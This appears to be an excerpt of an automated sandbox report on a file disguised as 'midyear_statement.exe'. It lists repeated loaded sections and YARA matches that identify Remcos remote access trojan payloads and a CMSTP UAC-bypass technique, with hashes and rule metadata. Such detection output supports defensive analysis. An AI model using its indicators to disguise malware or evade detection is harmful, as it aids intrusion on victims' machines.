Source: C:\Users\user\Desktop\midyear_statement.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Section loaded: ??.dll	Jump to behavior

Uses 32bit PE files

Source: midyear_statement.exe

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI

Yara signature match

Source: 24.2.wkrriuhD.pif.5919e2.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 24.2.wkrriuhD.pif.5919e2.1.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 24.2.wkrriuhD.pif.5919e2.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 33.2.wkrriuhD.pif.5919e2.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 33.2.wkrriuhD.pif.5919e2.1.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 33.2.wkrriuhD.pif.5919e2.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 31.2.wkrriuhD.pif.590000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 31.2.wkrriuhD.pif.590000.1.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 31.2.wkrriuhD.pif.590000.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 24.2.wkrriuhD.pif.5919e2.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 24.2.wkrriuhD.pif.5919e2.1.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 24.2.wkrriuhD.pif.5919e2.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 33.2.wkrriuhD.pif.590000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 33.2.wkrriuhD.pif.590000.2.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 33.2.wkrriuhD.pif.590000.2.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 31.2.wkrriuhD.pif.5919e2.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 31.2.wkrriuhD.pif.5919e2.0.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 31.2.wkrriuhD.pif.5919e2.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 33.2.wkrriuhD.pif.590000.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 33.2.wkrriuhD.pif.590000.2.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 33.2.wkrriuhD.pif.590000.2.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 33.2.wkrriuhD.pif.5919e2.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 33.2.wkrriuhD.pif.5919e2.1.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 33.2.wkrriuhD.pif.5919e2.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 31.2.wkrriuhD.pif.24140000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 31.2.wkrriuhD.pif.24140000.2.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 31.2.wkrriuhD.pif.24140000.2.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 24.2.wkrriuhD.pif.12330000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 24.2.wkrriuhD.pif.12330000.2.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 24.2.wkrriuhD.pif.12330000.2.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 24.2.wkrriuhD.pif.12330000.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 24.2.wkrriuhD.pif.12330000.2.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 24.2.wkrriuhD.pif.12330000.2.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 31.2.wkrriuhD.pif.24140000.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 31.2.wkrriuhD.pif.24140000.2.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 31.2.wkrriuhD.pif.24140000.2.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 31.2.wkrriuhD.pif.5919e2.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 31.2.wkrriuhD.pif.5919e2.0.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 31.2.wkrriuhD.pif.5919e2.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 24.2.wkrriuhD.pif.590000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 24.2.wkrriuhD.pif.590000.0.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 24.2.wkrriuhD.pif.590000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 31.2.wkrriuhD.pif.590000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 31.2.wkrriuhD.pif.590000.1.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 31.2.wkrriuhD.pif.590000.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 33.2.wkrriuhD.pif.4f0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 33.2.wkrriuhD.pif.4f0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 33.2.wkrriuhD.pif.4f0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 24.2.wkrriuhD.pif.590000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
